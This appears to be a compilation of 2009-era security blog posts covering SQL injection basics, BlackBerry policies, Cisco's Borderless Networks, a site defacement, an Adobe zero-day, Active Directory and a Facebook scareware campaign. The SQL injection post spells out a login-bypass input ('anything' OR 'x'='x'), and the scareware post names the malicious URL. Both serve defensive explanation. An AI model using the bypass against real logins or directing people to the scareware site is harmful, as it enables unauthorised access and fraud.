Pangolin is an automated SQL Injection tool developed by NOSEC ostensibly to assist in penetration testing. The tool can be used to detect SQL injection vulnerabilities on a web application, and upon detection allow the user to perform certain operations such as DBMS fingerprinting, retrieving user ids and hashes, dump tables, run SQL statements, and so forth. NOSEC is a web site hosted by a firm now called Connaught Cup in Shenzhen, China.

What is SQL Injection?

SQL Injection is basically a code injection technique that attempts to get an SQL query to execute via data inputted into a field from the client to the application. For example, let’s say we have a piece of code like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

The fields $username and $password are coming from the browser. Our user normally logs in by entering John as user id and ‘Password1′ as his password (he shouldn’t have a weak password like that, but he does). The query analyzes it, sees the $username = John and checks to make sure password = Password1. The password statement evaluates as true, and the web application authenticates or logs in the user.

A bad actor comes along and inputs John as the user id ,but instead of a password he fills in anything’ OR ‘x’='x. Let’s see how our code evaluates this:

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

Now the AND password portion of the query is always returning true, not just when the password is actually the correct one. That’s because we’ve changed the execution of the query, now it reads that password can equal anything OR x = x. x will always equal x, they are equivalent values, thus the password = statement evaluates to true and the web application authenticates the user even though a proper password was never supplied.

SQL Injections in practice get much more complex than this, but the basic premise remains the same, attempt to get the web application to execute a SQL query in a way unanticipated by the web site’s developers in order to get the application to reveal information or perform a database action.

Related Posts:

• Turning an ATM into a Slot Machine
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

About one month ago, a problem in the Blackberry browser left devices open to attack due to a certificate notification flaw. An advisory from Research in Motion details how a malicious user could spoof a “trusted” website then use a phishing technique to send users to that site using SMS or email.

A malformed SMS message causing a memory corruption error could be used to cause a denial of service or execution of arbitrary code on Apple’s iPhone (CVE-2009-2204). Although not related to Blackberry, I wanted to get the point across that mobile devices are beginning to see their fair share of vulnerabilities which could lead to malicious activity.

Turning our focus back to the Blackberry, a director for Hermis Consulting in Jakarta, Indonesia recently wrote an application for the Blackberry which can turn the handheld into a remote bugging device.
The software is called PhoneSnoop and was written to demonstrate how an “attacker can activate the microphone of a Blackberry handheld and listen to sounds near or around it.” There are currently no stealth or spyware aspects of the software, but it shows how the capabilities of a Blackberry could be used for malicious purposes.

These issues remind me of my previous position, managing a global infrastructure team for a financial company.  Exchange and Blackberry services were under our umbrella of responsibilities.  When I first arrived many years ago, as with most companies that are victims of rapid growth, IT policies were non-existent.  Though unpopular with the users, I had to have a BES policy implemented, and one that took quite a bit of control from the user. From password policies to WiFi disabling, where is your BES policy?

Note: A BES (Blackberry Enterprise Software) is middleware software which connects to your enterprise messaging solution (such as Microsoft Exchange or IBM Lotus Domino) and redirects email and PIM information to and from Blackberry mobile devices.

Note: A BES IT Policy is configured from the BES and are assigned to the Blackberry devices over the air.  Policies can be assigned to users and user groups. The default installation does not enforce policies which should definitely be enabled and are best practices on any platform or device. See the bottom of this post for the KB with instructions on how to create and apply policies.

At the bare minimum, you should have these basic policies set:

• Password Required Rule – True
• User Can Change Time – False
• User Can Disable Password – False
• Password Pattern Checks – Require at least 1 alpha and 1 numeric
• Minimum Password Length – 7 characters
• Maximum Password Age – 30 or 60 days
• Set Password Timeout – 10 minutes
• Set Maximum Password Attempts – 10
• Maximum Password History – 6
• Set Owner Info – Customize
• Set Owner Name – Customize
• Lock Owner Info – Customize
• Remote Wipe Reset to Factory Defaults – True

Control Upgrades:

• Allow Non Enterprise Upgrade – False
• Disallow Device User Requested Upgrade – True

Camera Options:

• Disable Photo Camera – True 
• Disable Video Camera – True

Application Control:

• Disable Application Center – True
• Allow Application Down Services – False
• Disallow Third Party Application Downloads – True

Other Policies I Like:

• Disable USB Mass Storage – True
• Disable Blackberry Messenger – True
• Disable Bluetooth – True
• Allow Application Download Services – False
• Allow Hotspot Browser – False
• Allow IBS Browser – False

Too Much?

Now, these policies are starting to sound too strict at a glance; but, the purpose of the device is for users to have access to their email, contacts and calendars anywhere and to have a mobile phone they can be reached at any time.  Cameras, Hotspots and transferring photos and music using USB mass storage are features that are not necessary. If you have legitimate business needs for these features, than you can enable them for certain user groups using a policy.

The policies mentioned are a very small fraction of what is available. I’d like to hear which policies you find useful in your environment, or which you find to be more harm than good.

For a complete list of policies, please see the Policy Reference Guide.

Howto

Create, Assign, View, and Send IT policies
Doc ID : KB02022
Last Modified : 2007-02-01
Document Type : How To
Environment
This article applies to BlackBerry® Enterprise Server software versions 3.6, 4.0, and 4.1 for Microsoft® Exchange.
Procedure
The BlackBerry Enterprise Server uses an IT policy to control the behavior of the BlackBerry devices assigned to it. IT policies cover a wide range of BlackBerry device functions (for example, passwords, attachment viewing, and available browsers). Administrators can create custom IT policies in addition to the IT policies already present on the BlackBerry Enterprise Server.
Creating IT Policies
To create an IT policy, complete these steps:
BlackBerry Enterprise Server software versions 3.6 and 4.0

1. Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.
2. Right-click the BlackBerry Enterprise Server name, then click IT Policy.
3. Click New, then create a name for the IT policy.
4. Select the check box beside each IT policy rules item you would like to assign. A description of the IT policy will appear.
5. To enable the selected IT policy, in the description window, click TRUE.
6. Click Apply, then click OK.

BlackBerry Enterprise Server software version 4.1

1. In BlackBerry Manager, select Servers, then click the Global tab.
2. From the Tasks menu, click Edit Properties.
3. Select IT Policy, then double-click IT Policies.
4. Click New, then create a name for the IT policy.
5. Select an IT policy group to view the associated IT policy rules.
6. Select the appropriate IT policy rules.
7. Click Apply, then click OK.

Assigning IT Policies
To assign an IT policy to a BlackBerry device user, complete the following steps:
BlackBerry Enterprise Server software versions 3.6 and 4.0

1. Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.
2. Right-click the BlackBerry Enterprise Server name, then click IT Policy.
3. Select an IT policy, then click Edit User List.
4. Click Add Users to This Policy.
5. Select a BlackBerry device user, then click Add.
6. Click Close, then click OK to close the Edit IT Policy Userlist window.
7. Click OK again.

BlackBerry Enterprise Server software version 4.1

1. In BlackBerry Manager, select Servers, then click the Global tab.
2. From the Tasks menu, select Edit Properties.
3. Select IT Policy, then double click IT Policy to User Mapping.
4. Select a BlackBerry device user, then click the button next to the appropriate IT policy.
5. Click OK to close the IT policy to User Mapping window.
6. Click Apply, then click OK.

Viewing IT Policies
To view IT policies on the BlackBerry Enterprise Server, complete these steps:
BlackBerry Enterprise Server software versions 3.6 and 4.0

1. Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager
2. Right-click the BlackBerry Enterprise Server name, then click IT Policy.
3. Select an IT policy, then click View to see the BlackBerry device and Desktop Policy Settings that have been applied.
4. Click OK to close the View Policy window.
5. Click OK again.

BlackBerry Enterprise Server software version 4.1

1. In BlackBerry Manager, click Servers, then click the Global tab.
2. From the Tasks menu, select Edit Properties.
3. Select IT Policy, then double-click IT Policies.
4. To view the IT policy rules, click Properties.
5. Click OK.

To view an IT policy on a BlackBerry device, complete these steps:

1. From the Home screen, select Options.
2. Select Security Options > General Settings.
3. The IT policy Name, Last Updated, and Time Stamp fields will be listed.

Note: Depending on the BlackBerry device and BlackBerry Device Software version, the instructions for viewing the IT policy on the BlackBerry device may vary. For example, on the BlackBerry 7100 series, the BlackBerry device user must select Settings or Tools, then select Security.

Sending IT Policies
To send an IT policy to a BlackBerry device user, complete the following steps:
Note: By default, when you assign an IT policy to a BlackBerry device user, the IT policy is automatically sent to the BlackBerry device user.
Note: When a change is made to an existing IT policy, it is automatically resent to all BlackBerry device users assigned to that IT policy.
BlackBerry Enterprise Server software versions 3.6 and 4.0

1. Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager
2. Select the BlackBerry Enterprise Server name, then right-click a BlackBerry device user name.
3. Click Properties.
4. On the IT Admin tab, click Resend policy.
5. Click Apply, then click OK.

BlackBerry Enterprise Server software version 4.1

1. In BlackBerry Manager, select the BlackBerry Enterprise Server name.
2. Select a BlackBerry device user, then click the question mark ( ? ) symbol beside IT Admin.
3. From the menu that appears, you can resend the IT policy or assign an IT policy to a BlackBerry device user.
4. Click OK.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Little Bit of History

I am going to quickly cover some of the history of the Internet and how it grew borders, but please skip to the highlight of the article if you are familiar with this already: Borderless Networks, What?

ARPANET (‘69-’91)

In the beginning, there was ARPANET which was the pioneer in packet switching networks and gave providers the choice of which method and hardware for communication it would use. However, the base protocol used for devices to communicate in ARPANET was NCP. The NCP protocol could best be described as a network device driver and less as a network transport stack. It did not have any method for end-to-end error handling which was seen as a problem, but nothing was done about this until 1983.

In 1983, TCP/IP replaced NCP as the protocol for transport and ARPANET became a part of what was to become the Internet. TCP/IP was a huge improvement over NCP in that it accounted for problems on the network and allowed the network not to come to a grinding halt when packets were lost. It also achieved the concept of end-to-end connectivity between each host. This meant that as long as two hosts were on the Internet they could reach each other by utilizing standard TCP/IP. This standard framework also lead to the growth of many different applications as there was no longer any need to make changes to the network to add new applications/protocols.

First Borders (‘91-’94)

All the building blocks were in place and what formed was a large group of interconnected networks to share and exchange data. Then the first virus and worm hit in 1983 and 1988 respectively. The morris worm gained a fair amount of media attention and in fact prompted the establishment of CERT. Even in this embryonic stage the vitality of the information being shared caused many researchers to begin placing limitations on the end-to-end connectivity of their hosts. Thus began the ‘Us’ and ‘Them’ status of the Internet.

‘Us’ and ‘Them’ started out simple with a move to keep networks segregated-or put another way, adding a border between the networks. At first, the borders were nothing more than routers that limited the effects from network A from spilling over into network B. They were effective, but in 1991 DEC released the first modern Firewall: SEAL. This marked the first real security border on the Internet, where all packets were inspected and compared to a set of policy rules before being passed on. These first security borders were instrumental in providing the trust and assurance in the network that companies and researchers required, speeding the growth of the Internet. While intrusion was still possible, the bar of entry was raised beyond causal attacks and probes.

Figure 1: Us vs. Them

In 1992, the dominant addressing of hosts was IPv4, where each host is a assigned a 32-bit address. This assignment limited the total number of addressable hosts to 4,294,967,296, but, due to reservations and subnetting, this could never be fully utilized. At this time, it was recognized that IPv4 limitations would be become a problem in the future, beginning the process of creating a new IP protocol with a much higher number of addressable hosts. IPv6 was born in 1994, based on a 128-bit address for each host. This would effectively allow every man, woman, and child on Earth to be assigned an address many times over. As a part of the formation of IPv6, security between networks was also taken into account and IPSec was created as a requirement of the IPv6 protocol.

IPv6’s creation gave the Internet a secure method of communications between networks via IPSEC and nearly unlimited address space, but IPv6 did not get off the ground quickly. This was mostly due to the fact that all devices and operating systems would need to be upgraded to handle the new protocol, and there was little to no pressure from the market to push things forward. IPSec on the other hand did take off, as it quickly became the standard method for interconnecting trusted networks over an untrusted medium (such as the Internet).

At the same time that IPv6 and IPSec were being developed, another group of people began working on an alternate method for dealing with the lack of addressable space in IPv4. Network Address Translation (NAT) was published in RFC1631 in 1994 as a short term solution, while the larger problems were being addressed. NAT became very successful quickly as it allows a very large number of hosts to access the larger Internet while using very few publicly addressable IP addresses. As with most things, NAT came with some trade-offs. One of the big ones was that hosts no longer had complete end-to-end connectivity. Thus, another border on the network was created; in practice firewalls became the dominate NAT devices. Nonetheless, the NAT border would create problems for applications developers for years to come.

Present (‘09)

In 2009, the way Internet runs is really not very different from 1994; IPv6 is just now getting underway, NAT is used everywhere, and IPSEC still secures networks over an untrusted medium. What has changed in a big way is the applications and uses of the Internet. Telephone calls commonly use the Internet for transport, on demand video is a huge source of traffic, social media networks garner huge numbers of users, online shopping is an important revenue stream for companies, and most recently more and more services are being hosted elastically on demand via the Internet.

Borderless Networks. What?

Now let’s get back to Borderless Networks…

Cisco envisions a global network where you can go any place and access any data you could need at anytime. John Chambers detailed the approach on a video at Cisco.com:

Cisco also has a Virtual event on Oct 20th for Borderless Networks, and have been encouraging people to register via twitter and emails for the last two weeks.

I first learned of the Borderless Networks push during the SC World Congress. I was there to get a preview of Borderless Networks as presented by Joel McFarland. The session description sounded interesting and as it was a keynote there was nothing else to pull on my time.

Two co-workers and I attended the session, but being a little late we had to make our way to the very front of the room to find seats. Up front we were able to hear and see everything in great detail, but in hindsight this might have not been the best place for us. There was no way Joel could have missed the looks of skepticism on all three of our faces.

Joel pushed the Cisco idea of Borderless Networks in many different ways, but pointed to the iPhone as the game changer, the beginning of things to come. Then iPhone and salesforce.com became his prime example of how the mobile sales team are almost completely disconnected from the enterprise network. They access leads, manage contacts, input orders, and exchange notes and information all without even logging into the corporate network. At this point, I looked to my co-workers with a questioning expression and whispered the rhetorical question “No corporate login?“.

The example Joel used is common for a sales workforce, and is actively encouraged in many environments, but this was just something that I have always felt was wrong. In many companies, sales leads are valuable information and something that competitors and even other sales people would actively try to gain access to. When all access to this information is controlled by an external party you are no longer able to apply your own controls. In fact, you are beholden to the policies and procedures of the provider. Joel was one step ahead of me on this. He pointed out the problems that were playing through my head and countered that salesforce.com can be made to use a corporation’s internal authentication methods (Active Directory, RSA Token, etc.). As such, your internal policies for access and removal of access are once again in your control. I conceded. Joel is correct that salesforce.com can be brought into line with one’s internal security policy, but he does not address the issue of the remote device-the iPhone itself.

Borderless

Let me come back to the iPhone in a bit, I want to point out another slide that came up during this iPhone praise. In Figure 2 I have created a combined version of the two slides Joel was showing to demonstrate the future of networking (I have recreated them from memory, but its close enough for this post).

Figure 2: Before & After

In Figure 2, we have the before and after sections. According to Joel, currently the before example is a good summary of how most enterprises networks allow access into and between their networks. This Joel and I agree on.

As seen in the before section, you have a defined entry point into the network from outside, where all external resources gain access. This is your border between “us” and “them“. In the examples, both the remote home desktop and iPhone access the network and are allowed across past the border only if proper authentication and authorization have take place. Once completed, the remote device is granted access to the resources that are allowed for it to function as an effective job tool: access to to internet via internal proxy, access of files in the London office, or logging into the salesforce.com website. The key thing is that all access flows through this single point of entry.

By restricting access for remote devices to a single point, we are able to overcome some technical shortcomings and greatly reduce the vectors of attack for the network. NAT is required due to the limited number of publicly addressable addresses. Thus end-to-end connectivity is not an option for the remote devices. The use of IPSec for transport and assigning a RFC1918 address to the remote device end of the IPSec tunnel allows one to overcome the NAT limitations. This gives you remote device end-to-end connectivity within the enterprise network. By using this method the network administrators are able to capture and monitor at a single point all access into and out of the network. NAC, IPS/IDS, and other methods of monitoring are commonly deployed here.

With the after diagram of Figure 2, we see the future as Cisco/Joel see it. This is where all resources are able to access all other resources; also known as complete end-to-end connectivity. Joel did not say how this was to be achieved, but given the network diagram it’s not hard to surmise that Cisco is planning a big push for IPv6. IPv6 will allow for this type of network, and will bring down the NAT boundary. With it the technical limitation of too few addresses for end-to-end connectivity on the Internet is eliminated and things can get a lot more complex as we see in the after section of the diagram.

On the after diagram you see end-to-end connectivity to each resource both inside the network and outside. We have an iPhone going directly to salesforce.com, directly accessing a file in the London office, and able to access all the data that it could ever need. What about limiting access to resources? How do you make sure that a remote home desktop does not start copying all of the data from the London office, NYC office, and salesforce.com to a remote site? What if the desktop is infected with malware? How do you log the activity of the remote device access? All the questions become much harder when you have completed end-to-end connectivity, and historically we have learned it becomes an even larger problem when there are remote devices involved.

All the questions I have asked about the security of the after sections can be answered with products already on the market and in fact are recommended for use in both networks. The problem becomes the scale that is needed to protect and defend a network that has complete end-to-end connectivity. Once again, going back to the after diagram, only taking into account remote device access, the number of policies that needs to be maintained, protected, and monitored goes from 1 to 4. Now a growth of 400% is big, but almost manageable. If you start to think about a small enterprise with 20 offices, 2 datacenters, and 200 remote users, the problem of scale is instantly untenable.

IPv6 will solve a lot of problems for networks as the need for NAT will go away and devices will be able to directly address each other across networks and boundaries, but as with just about everything there are side effects. Keeping control of access into and out your network is the first line of defense and with IPv6 this becomes a policy and enforcement issue even if it is no longer a technical requirement.

The iPhone, Key to the Borderless Network

Joel said he likes his iPhone and from the huge number of videos from Cisco featuring an iPhone it’s safe to assume Cisco does too. During the keynote Joel pointed out the iPhone a few times in a number examples and in general with heavy praise. Joel and I agree the iPhone is an amazing device, an important step forward in mobile computing. After this Joel and I begin to disagree, namely around one key point: “The iPhone is a game changer.” I think that statement needs to add “for the consumer market“.

Figure 3: The iPhone

iPhones are enabling users to use the Internet from almost anyplace; it’s one of the most popular cameras on flickr, has a huge list of applications, and, for some people, a complete replacement for the traditional computer. While its strong points work well in the consumer market, in the enterprise markets it’s a very different beast. In fact the strongest points for the iPhone in the consumer market are security concerns for the enterprise. Application controls are limited, centralized control is even more limited, and encryption of the data residing on the devices is a problem on the most fully featured phone to date.

Devices like the iPhone should be thought of less as a phone and more as a laptop. With that comes all the same protections and controls that we use to mitigate risk on an enterprise laptop. Here is a quick list of what I expect from a laptop and by extension from an iPhone for it to become a viable remote access device in the enterprise environment:

• Virus and Malware software with centralized reporting
• Secure communications for the device; both internal resources and the ability to define policies
• Strong Data Encryption on the device
• Ability to do remote kill of device
• Application installation and run controls
• Web Filter/Proxy controls
• Access controls, password complexity settings and password failure data destruction

Some of the areas listed are available on the iPhone, but none of them are near complete and ready for everyday use in an enterprise. Research In Motion (RIM) dominates the enterprise market for the reasons I have listed here. RIM via the BlackBerry Enterprise Server (BES) gives the enterprise complete control of every device that connects via a centralized management station. BES also does network traffic correctly in that all devices came back to the BES at a single point of entry into the enterprise. This allows an enterprise to place additional control directly attached to the BES and not with multiple devices all over the network. RIM’s BES product represents the minimum level of security that should be expected for remote access of phone like devices. I would go so far as to say it should be the starting standard for how remote access devices should behave.

The iPhone might be the start of things to come, but in no way is it even close to ready for the enterprise market.

Why?

Cisco’s push with Borderless Networks is either something that they haven’t completely vetted from a security perspective or the security strategy isn’t completely explained in the marketing. The huge increase in the number of points needing protection, the corresponding increase in the policy and management, and management data flow and access controls are areas that need addressing. These are problems we still having troubles controlling with our current network deployments. Unless Cisco has a magic bullet coming out of their research and development departments, I don’t see how this move to Borderless Networks is even possible.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action

10/05/2009 Appearance

Site appearance according to posting on Zone-H.

Correct Appearance

NSA Career Fair schedule, correct appearance.

SQL_Master

The attacker, using the handle SQL_Master, is attributed on Zone-H to site defacements of Google Tokelau (a territory in New Zealand) and a Microsoft web property in Korea. He has been associated with the Jurm team, a Moroccan hacker group known primarily for web site defacements of the Israeli version web sites of major companies, for example Kia, Sprite, and Fanta.

A Microsoft defacement attributed to SQL_Master from July of this year references “Agd_Scrop, free him”. Agd_Scorp was part of a Turkish hacker group called Peace Crew that defaced NATO and U.S. military web sites as a political reaction to Operation Cast Lead, or as its more commonly referred to the Gaza War, where Israel and Hamas forces clashed starting December of 2008. The two hacker groups are known to have partnered in defacements at the beginning of this year during the conflict in what was termed a virtual war where a few thousand Israeli web sites were defaced. Agd_Scrop appears to have been arrested by Kayseri (central Turkey) police over the summer, and faces up to 20 years in prison on various cybercrime related charges.

National Security Agency

The NSA or National Security Agency is the cryptologic intelligence agency of the United States. Created in 1952 under President Truman, its primary initial responsibility was the collection and analysis of foreign communications. In 2008 President George W. Bush signed a directive authorizing the NSA to monitor the computer networks of all federal agencies, giving the agency a primary role in federal efforts around cybersecurity.

Because of this role and other factors, including the agency’s historical role with cryptographic systems and controversial domestic wiretapping programs, NSA networks and computer systems are an attractive target for crackers. Further, because of the agency’s role in cybersecurity monitoring, defacements such as this one are embarrassingly problematic.

Zone-H.org

Zone-H.org, a site hosted in France which has been around since 2002, hosts an archive of defaced web sites. In January 2007 the site itself was a victim of a pseudo defacement, when a team from Saudi Arabia gained access to the registrar’s administrative panel and redirected the zone-h.org domain name to a different IP. The site’s mission is very similar to the defacement archive that used to be maintained at attrition.org. Both have been the subject of criticism over the years, the suggestion being that hosting the archive is itself an incentive for site defacements. The counter to this is that without the central archiving of the evidence of web site defacements, the problem would be less known and understood by the security community. Companies may also try to sweep such episodes under the rug. Besides, the site defacements would simply be posted in other places (forums and similar web sites).

Related Posts:

• iPhone 4 Ordering and Session Switching
• Newsweek Reports Zombie Invasion
• Going After BP
• May’s Patch Tuesday
• March’s Patch Tuesday

A new zero-day vulnerability in Adobe Reader and Acrobat 9.1.3 has been identified by Chia-Ching Fang and the Taiwanese Information and Communication Security Technology Service Center that allows an attacker to remotely execute arbitrary code. The attack is seeded by providing via e-mail or download a specially crafted PDF file which in current examples will then drop a malware executable as well as an unaffected pdf file. McAfee is identifying this under Exploit-PDF.m, and has a signature for a specific Trojan already identified. This is the fourth PDF related zero-day attack of 2009, and a further incentive for enterprises to bring patching of applications in line with processes for operating system patching.

The crafted PDF file contains a Javascript which is used to execute arbitrary code via a technique known as heap spraying. The initial shell code jumps program execution to a second shell code, which in turn executes a malicious file that creates a backdoor (remote access to the infected computer). Trend Micro is identifying this malware as a Protux variant. Protux backdoors provide user level access to the machine and have been associated as the payloads of Microsoft Office (Word, PowerPoint, Excel, Access) as well as previous Adobe Reader exploits. The Protux family of Trojans has been around since at least 2007.

The identification of this exploit has prompted Adobe to announce release of a critical patch for release on Tuesday, October 13th. The company posted a security advisory yesterday, announcing plans to release the update to “resolve critical security issues”. The vulnerability is being exploited, although it is unclear how widespread the attacks are. Adobe asserts that the vulnerability is being exploited in “limited, targeted attacks” limited to Windows operating systems although the vulnerability itself also exists for other operating systems.

“There are reports that this issue is being exploited in the wild in limited targeted attacks”
– David Lenoe of Adobe

Vupen Security posted an advisory on the vulnerability (CVE-2009-3459) which states that the issue is an unspecified memory corruption error, which could be exploited allowing attackers to comprise a system remotely.

Workarounds

Disabling Javascript on Adobe Acrobat

Adobe notes that disabling Javascript mitigates against the specific exploit identified, although it would be possible to create a variant that does not rely on Javascript. To disable Javascript in Adobe Reader or Acrobat, select Edit > Preferences, select the JavaScript option on the left, and uncheck the Enable Acrobat JavaScript option as shown.

Uncheck to disable Acrobat JavaScript

Data Execution Prevention

Also, users with DEP enabled on Windows Vista or Windows 7 are protected from this exploit. Data Execution Prevention (DEP) performs additional checks on memory to help prevent malicious code from running, designed to prevent buffer overflow attacks. To enable DEP on Windows for all or individual programs, proceed to Control Panel -> System and Maintenance -> System, click on Advanced System Settings, under Performance click Settings, and finally under the Data Execution Prevention tab click Turn on DEP for all programs and services except those I select. If you can not find Acrobat in the list of programs, click Add and browse to the Acrobat executable (.exe) file and click Open. For more information on DEP settings, visit the Microsoft help page.

In Conclusion

In June Adobe moved to the same Tuesday patch management schedule that Microsoft and Oracle previously adopted. This latest zero-day exploit represents another opportunity to address an ongoing issue for organizations: that patch management must extend beyond just the operating system level. While enterprises focus on ensuring the latest Microsoft updates to the desktop and server environment, applications, such as Adobe Reader, fail to be a part of the the same rigorous patch management exercise.

Qualys demonstrated this problem when the first Adobe exploit was released this year in February, APSA09-01. While a fix was released on March 10th (demonstrated by the red line in their graph), by April 27th there was still no clear reduction in the number of vulnerable machines. A 30 day patch management cycle, including testing of the patch before full enterprise release, would have shown a steep drop off on or about April 10th:

Source: http://laws.qualys.com/lawsblog/2009/04/new-adobe-0-day-vulnerability.html

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action

“…I want you to go to Conservapedia and make me a Biblical figure…”

Stephen Colbert

According to Conservapedia, liberal bias has become a distortion in modern Bible translations including lack of precision in language both original and modern as well as translation bias. Thus the project seeks to provide a fully “conservative translation” of the Bible. The project seeks to identify liberal terms in the bible and replace them, identify where liberal terms for vices have been improperly omitted, identify conservative terms improperly omitted, and replace words that have lost their meaning.

You can read all about it here: Conservative Bible Project

Conservapedia Bible Project

Conservapedia itself is a project written from an American centric and conservative Christian point of view, specifically young earth creationist (literal interpretation of Biblical texts). It was started by Andy Schlafy, a lawyer and social studies teacher who is the son of a conservative activist and constitutional attorney, Phyllis Schlafly. The project was initiated as a response to his perception that Wikipedia had become liberal, anti-Christian, and anti-American.

Apparently the “Colbert Bump” takes the form of a denial of service for web sites, as the site has been consistently inaccessible from when Colbert made his request and for hours following.

Update

Colbert has been integrated into the Book of Genesis:

In the beginning, Stephen Colbert created...

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Functional levels were first introduced when Active Directory made its appearance in Windows 2000 Server. They allowed you to run different versions of domain controllers in your environment, and when all the domain controllers were brought up to a certain version of Windows, you could raise the functional levels to gain the added features of that operating system version. Now that Windows 2008 R2 is released, it is unlikely that you will mass deploy this new operating system to your entire forest or domain. Instead, you’ll deploy a single domain controller and kick the tires, so to speak. The time will eventually come when you’ve upgraded every domain controller to R2, and at that point you can raise the functional level to 2008 R2 to take advantage of the new features.

Functional levels can be raised in domains or, as of Windows 2003 Server, in the forest, providing different features in each. They are differentiated by labeling them Domain Functional Level and Forest Functional Level.

What’s new in 2008 R2

Domain Functional Level

There are two features added when raising the domain functional level to 2008 R2. They are Authentication Mechanism Assurance and Automatic SPN Management.

Authentication mechanism assurance is meant for domains that utilize federation services (ADFS) or certificate-based authentication methods, such as smart card or token-based authentication. This mechanism adds information to the user’s kerberos token on the type of authentication used. This allows administrators to modify group membership based on how the user authenticates. For example, a user can have access to different resources if they log in with a certificate versus when they log in with just their username and password.

Automatic SPN management provides a method for managing service accounts for applications such as Exchange, SQL and IIS. In the past, regular domain accounts were used for these purposes, adding management headaches in terms of password management and service principle names (SPNs). This new feature provides the following benefits:

• A class of domain accounts can be used to manage and maintain services on local computers.
• Passwords for these accounts will be reset automatically.
• Do not have to complete complex SPN management tasks to use managed service accounts.
• Administrative tasks for managed service accounts can be delegated to non-administrators.

Forest Functional Level

There is one new feature in raising the forest functional level to Server 2008 R2, and it is long overdue. It is the Active Directory recycle bin. In the days of old, when an IT administrator or help desk operator accidentally deleted an OU filled with user or computer objects (this has happened more times than you would think), there would be a scramble to perform a restore. The delete replicates to all domain controllers, so an authoritative restore in Active Directory restore mode from a good backup using NTDSutil would be in order. With 2008 R2 forest functional level, a powershell cmd-let will undo this instantly.

Note that this feature is not enabled automatically when raising forest functional level. Additionally, you must run the following command in the Active Directory Module for Powershell.

Enable-ADOptionalFeature –Identity ‘CN=Recycle Bin Feature,CN=Optional Features,CN=Directory
Service,CN=Windows NT,CN=Services,CN=Configuration, DC=mydomain,DC=com’
–Scope ForestOrConfigurationSet –Target ‘mydomain.com’

Functional levels of previous version

The following are the previous functional levels and what features they added, as documented in Technet.

Domain Functional Levels:

Windows 2000 Native:

• Universal groups are enabled for both distribution groups and security groups.
• Group nesting.
• Group conversion is enabled, which makes conversion between security groups and distribution groups possible.
• Security identifier (SID) history.

Windows Server 2003

• The availability of the domain management tool, Netdom.exe, to prepare for domain controller rename.
• Update of the logon time stamp. The lastLogonTimestamp attribute will be updated with the last logon time of the user or computer. This attribute is replicated within the domain.
• The ability to set the userPassword attribute as the effective password on inetOrgPerson and user objects.
• The ability to redirect Users and Computers containers. By default, two well-known containers are provided for housing computer and user/group accounts: namely, cn=Computers, and cn=Users,. This feature makes possible the definition of a new well-known location for these accounts.
• Makes it possible for Authorization Manager to store its authorization policies in Active Directory Domain Services (AD DS).
• Includes constrained delegation so that applications can take advantage of the secure delegation of user credentials by means of the Kerberos authentication protocol. Delegation can be configured to be allowed only to specific destination services.
• Supports selective authentication, through which it is possible to specify the users and groups from a trusted forest who are allowed to authenticate to resource servers in a trusting forest.

Windows Server 2008

• Distributed File System (DFS) Replication support for SYSVOL, which provides more robust and detailed replication of SYSVOL contents.
• Advanced Encryption Services (AES 128 and 256) support for the Kerberos authentication protocol.
• Last Interactive Logon Information, which displays the time of the last successful interactive logon for a user, from what workstation, and the number of failed logon attempts since the last logon.
• Fine-grained password policies (FGPP), which make it possible for password and account lockout policies to be specified for users and global security groups in a domain.

Forest Functional Levels:

Windows 2000:

There were no forest functional levels, just domain.

Windows Server 2003:

• Forest trust.
• Domain rename.
• Linked-value replication (changes in group membership store and replicate values for individual members instead of replicating the entire membership as a single unit). This change results in lower network bandwidth and processor usage during replication and eliminates the possibility of lost updates when different members are added or removed concurrently at different domain controllers.
• The ability to deploy a read-only domain controller (RODC) that runs Windows Server 2008.
• Improved Knowledge Consistency Checker (KCC) algorithms and scalability. The Intersite Topology Generator (ISTG) uses improved algorithms that scale to support forests with a greater number of sites than can be supported at the Windows 2000 forest functional level. The improved ISTG election algorithm is a less intrusive mechanism for choosing the ISTG at the Windows 2000 forest functional level.
• An improved ISTG algorithm (better scaling of the algorithm that the ISTG uses to connect all sites in the forest).
• The ability to create instances of the dynamic auxiliary class called dynamicObject in a domain directory partition.
• The ability to convert an inetOrgPerson object instance into a User object instance, and the reverse.
• The ability to create instances of the new group types, called application basic groups and Lightweight Directory Access Protocol (LDAP) query groups, to support role-based authorization.
• Deactivation and redefinition of attributes and classes in the schema.

Windows Server 2008:

No forest functional level changes occurred from Windows 2003 to Windows 2008.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• Using Group Policy to Disable JavaScript in Adobe PDF Files

Meet Faith...or Emily...or...the face of the new Facebook attack

On Thursday morning, AVG researcher Roger Thompson, after sourcing some spyware attacks to a series of Facebook profiles, noted that these few hundred profiles were showing up with the same profile image (seen at left) but different profile information. The home video link on these profiles, belonging to Faith / Emily / whoever, points to the a web site that displays scareware dialogs: netmedtest.com/index.php?affid=30500.

Clicking the video url opens up a browser dialog box suggesting the user has viruses on their PC, suggests a system’s check and opens up a scareware dialog. Scareware is software sold or downloaded via creating a perception on the part of the user of a usually non-existent threat to the user that is typically non-functional or malicious.

The URL itself is registered to accounts with temporary or throw away e-mail addresses, amusingly these services like spambob and mailinator that were intended to help uses avoid spam are used by bad actors as the registration and contact e-mails for registering malicious web site URL’s. The site netmedtest is hosted in Haifa, Israel.

The Profile

The fake profile with video link.

